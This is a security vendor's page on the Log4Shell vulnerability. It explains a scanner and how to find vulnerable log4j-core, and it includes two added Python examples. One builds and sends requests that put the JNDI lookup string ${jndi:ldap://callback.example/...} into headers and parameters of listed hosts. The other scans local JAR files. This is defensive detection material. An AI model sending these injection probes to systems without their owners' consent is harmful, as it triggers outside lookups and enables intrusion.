Log4j Vulnerability - Find out Which of Your Servers Are Affected
The German Federal Office for Information Security (BSI) issued a red alert on Saturday night. Exploiting the Log4j vulnerability (CVE-2021-44228, "Log4Shell") takes nothing more than getting a crafted string into a line that the application logs. Attacks are already under way. Do not waste time: check the security of your systems.
Log4Shell vulnerability scanner for faster inventory
The LocateRisk Log4Shell scanner quickly identifies CVE-2021-44228 in reachable web applications. The software runs on the most common operating systems, so systems on the internal network can be scanned as well.
Why is the scanner not included in the regular LocateRisk scan? In our view the check cannot be classed as "non-invasive" because of the increased request load: the scanner places the JNDI lookup string (${jndi:...}) into various HTTP headers, the User-Agent and URL parameters, so that every code path that logs one of those fields triggers the lookup. A system crash is unlikely, but cannot be ruled out.
Important: Only systems for which consent for an invasive scan has been obtained will be checked!
How do I use the Log4Shell scanner? The analysis tool takes a line-separated list of domains / IP addresses as input; ports and protocols are added automatically by the software. The system list from the LocateRisk scan is a good starting point.
This is how it works:
1. Enter the domain names and IP addresses to be checked in the "hosts.txt" file in the application directory, one per line. IP ranges are not supported; list each address individually.
2. Run the application.
3. The results are shown on the console and written to the results file in the application directory.
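The kind of probing described above, as an added example in Python (not LocateRisk's scanner and not its code): read a hosts.txt list, reject ranges, add ports and protocols, and put a tagged JNDI lookup string into several headers, the User-Agent and URL parameters in one request per port. The callback host, the port list and the header and parameter names are assumptions. The hit is observed at your own LDAP/DNS listener, not in the HTTP response, and the sender must only be pointed at systems whose owners have consented to an invasive scan.

```python
"""Build (and, with consent, send) Log4Shell probe requests for a host list.

Added example, not the LocateRisk scanner. Assumed and not taken from the page:
the callback host, the port/protocol list, the header and parameter names."""
import re
import uuid
import urllib.error
import urllib.parse
import urllib.request

DEFAULT_TARGETS = [("http", 80), ("https", 443), ("http", 8080), ("https", 8443)]
PROBE_HEADERS = ["User-Agent", "Referer", "X-Forwarded-For", "X-Api-Version", "Authorization"]
PROBE_PARAMS = ["q", "username", "id"]
RANGE_RE = re.compile(r"^\d+\.\d+\.\d+\.\d+-\d")  # 10.0.0.1-10.0.0.9 style ranges


def parse_hosts(text):
    """Line-separated domains / IPs; blank lines and '#' comments are skipped.
    Ranges and CIDRs are rejected: list every host individually."""
    hosts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "/" in line or RANGE_RE.match(line):
            raise ValueError(f"ranges are not supported, list hosts one per line: {line}")
        hosts.append(line)
    return hosts


def jndi_payload(callback_host, tag):
    """The string Log4j 2.0-beta9..2.14.1 resolves when it logs a field containing it.
    The tag encodes run id, host and port so a hit at the LDAP/DNS listener can be
    attributed; the listener, not the HTTP response, is where results appear."""
    return f"${{jndi:ldap://{callback_host}/{tag}}}"


def build_probes(host, callback_host, run_id=None):
    """One request per (scheme, port), carrying the payload in every probe header
    and every probe URL parameter at once, so a single request covers several
    injection points. Returns a list of (url, headers) pairs."""
    run_id = run_id or uuid.uuid4().hex[:12]
    probes = []
    for scheme, port in DEFAULT_TARGETS:
        payload = jndi_payload(callback_host, f"{run_id}/{host}/{port}")
        query = urllib.parse.urlencode({p: payload for p in PROBE_PARAMS})
        url = f"{scheme}://{host}:{port}/?{query}"
        headers = {h: payload for h in PROBE_HEADERS}
        probes.append((url, headers))
    return probes


def send_probes(probes, timeout=5):
    """Send the requests. Only transport outcomes are returned; an HTTP error
    status still means the server may have logged (and resolved) the payload."""
    results = {}
    for url, headers in probes:
        req = urllib.request.Request(url, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                results[url] = resp.status
        except urllib.error.HTTPError as err:
            results[url] = err.code
        except (urllib.error.URLError, OSError) as err:
            results[url] = f"error: {err}"
    return results


if __name__ == "__main__":
    # Only against systems whose owners have consented to an invasive scan.
    with open("hosts.txt") as fh:
        targets = parse_hosts(fh.read())
    for target in targets:
        for url, status in send_probes(build_probes(target, "callback.example")).items():
            print(url, status)
```

A negative result from this kind of probe only says that none of the probed entry points produced a callback; it says nothing about log4j-core bundled in internal services, batch jobs or non-HTTP listeners.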
Are you interested in the solution? Then send a message to: sales@LocateRisk.com
Note: LocateRisk is not liable for damages or costs caused by the scans, nor for vulnerabilities that are not found. This is only a quick check: there is no test tailored to the respective applications. The tool is provided on a transitional basis; we will shut down the corresponding infrastructure again in a few weeks.
Since we cannot guarantee that every Log4j instance and the associated Log4Shell vulnerability will be found (an active probe only reaches entry points that are exposed over HTTP and whose input is actually logged), we recommend that you also log in to every system running Java applications and follow these five steps:
How to find out if and where you are using the Java library Log4j
Step 1 Open your latest security scan on the LocateRisk platform.
Step 2 Go to the "Details for professionals" list and select the "App" category filter for the report.
Step 3 Use the adjacent search to filter the results for the JAVA and TOMCAT applications, or for the affected applications listed below.
Step 4 Log in to the corresponding servers. Unusually high CPU load on a Java host can indicate that a cryptominer was dropped after exploitation; treat such a host as potentially compromised, not merely unpatched.
Step 5 Check every Java artifact you find on those servers (JAR, WAR and EAR files, Tomcat web applications) with a local scanner from GitHub such as CVE-2021-44228-Scanner or local-log4j-vuln-scanner. Because log4j-core is usually bundled inside other archives, the scanner must look into nested JARs. You will see immediately whether a vulnerable log4j-core is in the application and can fix it directly.
More information about the vulnerability and how to fix it is available directly from the BSI.
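What such a local check does, as an added example in Python (not the GitHub tools named above and not their code): walk a directory tree, open every JAR/WAR/EAR, recurse into nested archives, and flag any archive that still contains log4j-core's JndiLookup class with a version below the fix releases. The version rule is mine and encodes the public fix lines (2.16.0 and later, plus the Java 7 and Java 6 backports 2.12.2 and 2.3.1); the sample archives the demo builds are constructed stand-ins, not real software.

```python
"""Local scan for bundled log4j-core vulnerable to CVE-2021-44228.

Added example; not the GitHub tools named above. Assumptions: the version rule is
mine (fixed: 2.16.0+, 2.12.2+ on the 2.12 line, 2.3.1+ on the 2.3 line); the
sample archives built by demo() are constructed, not real software."""
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def version_tuple(v):
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' becomes (2, 0, 0)."""
    nums = [int(n) for n in re.findall(r"\d+", v.split("-")[0])]
    return tuple(nums + [0] * (3 - len(nums)))[:3]


def needs_action(version):
    """True when this log4j-core version still performs JNDI lookups on logged input."""
    v = version_tuple(version)
    if v >= (2, 16, 0):
        return False
    if (2, 12, 2) <= v < (2, 13, 0):  # Java 7 backport fix line
        return False
    if (2, 3, 1) <= v < (2, 4, 0):    # Java 6 backport fix line
        return False
    return True


def _log4j_version(zf):
    """Read the version from log4j-core's pom.properties, or 'unknown'."""
    if POM_PROPS not in zf.namelist():
        return "unknown"
    for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return "unknown"


def inspect_archive(data, name, findings, depth=0):
    """Check one archive held in memory and recurse into nested archives (fat JARs,
    WEB-INF/lib inside a WAR, JARs inside an EAR): log4j-core is rarely a
    top-level file on an application server."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = zf.namelist()
        if JNDI_LOOKUP in names:
            # JndiLookup is the code CVE-2021-44228 abuses. An archive where it was
            # deleted (the documented hot-fix) is not flagged, whatever its version.
            version = _log4j_version(zf)
            vulnerable = version == "unknown" or needs_action(version)
            findings.append((name, version, "vulnerable" if vulnerable else "fixed"))
        if depth < 5:  # bound recursion on pathological archives
            for member in names:
                if member.lower().endswith(ARCHIVE_EXT):
                    inspect_archive(zf.read(member), f"{name}!{member}", findings, depth + 1)


def scan_tree(root):
    """Return (path, version, status) for every archive bundling log4j-core's JndiLookup."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), path, findings)
    return findings


def build_sample_jar(version, with_lookup_class=True):
    """Constructed stand-in for a log4j-core jar: only the two entries the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if with_lookup_class:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def demo():
    """Scan a constructed Tomcat-like tree; returns {archive name: status}."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "webapps", "app", "WEB-INF", "lib")
        os.makedirs(lib)
        with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as f:
            f.write(build_sample_jar("2.14.1"))
        with open(os.path.join(lib, "log4j-core-2.17.1.jar"), "wb") as f:
            f.write(build_sample_jar("2.17.1"))
        with open(os.path.join(lib, "log4j-core-2.14.1-hotfixed.jar"), "wb") as f:
            f.write(build_sample_jar("2.14.1", with_lookup_class=False))
        war = io.BytesIO()  # a WAR that nests the vulnerable jar one level down
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.12.1.jar", build_sample_jar("2.12.1"))
        with open(os.path.join(root, "webapps", "shop.war"), "wb") as f:
            f.write(war.getvalue())
        return {os.path.relpath(name, root).replace(os.sep, "/"): status
                for name, _, status in scan_tree(root)}
```

Run scan_tree() against the Tomcat or application root (for example /opt/tomcat/webapps); the hot-fixed jar in the demo shows why the check keys on the presence of JndiLookup.class rather than on the version string alone.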
The LocateRisk team is working hard to include the affected applications in the risk analysis and will update the still incomplete list with each additional case that becomes known.
Products affected by the Log4j vulnerability
Most products are applications that use Java in their infrastructure.
A list of applications with the corresponding sources can be found on GitHub.
The provision of the Log4Shell scanner meets with great interest
We are glad that we can help many partners and customers with the Log4Shell scanner. The friendly feedback and the valuable suggestions for extending it confirm that providing it was the right decision.
"Thank you very much for the good cooperation! I have recommended the LocateRisk scanner to my customers. We all benefit from the tool."
"Our systems are already patched. Of course, we'd still be happy to be sent access to the analysis tool so we can take a closer look at it when we get a chance."
"I've already scanned our infrastructure with various tools, but one more time never hurts 😊"
"Our data protection officer informed me just now that you offer a free analysis tool for the Log4Shell vulnerability. I would very much like to test this and check our internal systems with it."
"We are excited about the software..."
"Good morning. Please send me the analysis tool. Thank you in advance."
"Hello everyone, glad to have this tool 🙂"
"We would love to give your test tool to our prospective customers."
"Great. Thanks a lot for the tool. Have a nice weekend and Merry Christmas;-))"